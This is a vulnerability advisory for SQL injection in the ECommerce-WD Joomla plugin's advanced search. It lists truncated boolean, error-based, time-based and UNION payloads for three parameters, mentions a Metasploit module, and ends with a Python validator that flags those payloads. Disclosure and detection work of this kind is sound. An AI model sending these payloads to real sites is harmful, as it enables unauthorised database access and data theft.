# Critical Vulnerability Information

- **Vulnerability Type**: Multiple Unauthenticated SQL Injection
- **Affected Component**: Web-Dorado ECommerce-WD Joomla Plugin (version 1.2.5)
- **Impacted Functionality**: Advanced Search Feature

## Vulnerable Parameters

- `filter_manufacturer_ids`
- `search_category_id`
- `sort_order`

## Vulnerability Types

- **Boolean-based Blind SQL Injection**
- **Error-based SQL Injection**
- **Time-based Blind SQL Injection**
- **UNION Query**

## Example Payloads

### filter_manufacturer_ids

- Boolean-based Blind (POST):

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1 AND 8066=8066 AND (7678=7678&[...]
```

- Error-based Injection:

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1) AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6[...]
```

- Time-based Blind:

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480&[...]
```

### search_category_id

- Boolean-based Blind (POST):

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND 3039=3039 AND (2627=2627&[...]
```

- Error-based Injection:

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(5158=5158,1))),0x7f706a6[...]
```

- Time-based Blind:

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND (1251=1251&[...]
```

- UNION Query:

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x7f706a6871)-- &filter_filte[...]
```

### sort_order

- Boolean-based Blind (POST):

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range[...]
```

- Time-based Blind:

```
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range[...]
```

## Exploit Module

- A Metasploit module exploits these vulnerabilities and can be found on ExploitHub:
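
Separately from the module referenced above, here is a defensive check for the three parameters listed under Vulnerable Parameters, for use in log review or a request filter. It is an added example, not part of the original advisory or the plugin's code. The expected value shapes (integer, comma-separated integers, `asc`/`desc`) and the function name `violations` are assumptions.

```python
import re
from urllib.parse import parse_qs

# Expected value shapes. These are assumptions: the advisory only shows "1"
# for the two id fields and never shows a legitimate sort_order value.
RULES = {
    "search_category_id": re.compile(r"\d{1,10}"),
    "filter_manufacturer_ids": re.compile(r"\d{1,10}(,\d{1,10})*"),
    "sort_order": re.compile(r"asc|desc", re.IGNORECASE),
}

def violations(post_body: str) -> dict:
    """Map each watched parameter to the values that break its expected shape."""
    fields = parse_qs(post_body, keep_blank_values=True)
    bad = {}
    for name, pattern in RULES.items():
        # Check every occurrence so a repeated parameter cannot hide a bad value.
        hits = [v for v in fields.get(name, []) if v and not pattern.fullmatch(v)]
        if hits:
            bad[name] = hits
    return bad

# Constructed sample bodies; the two flagged values are the truncated
# boolean-based strings quoted in the advisory.
CLEAN = "product_id=&search_name=&search_category_id=1&filter_manufacturer_ids=1,4&sort_order=asc"
BAD_MANUFACTURER = "search_category_id=1&filter_manufacturer_ids=1 AND 8066=8066 AND (7678=7678"
BAD_CATEGORY = "search_category_id=1) AND 3039=3039 AND (2627=2627&filter_manufacturer_ids=1"

if __name__ == "__main__":
    for body in (CLEAN, BAD_MANUFACTURER, BAD_CATEGORY):
        print(violations(body) or "ok")
```

The same shape checks can run server-side before the values reach a query, alongside bound parameters.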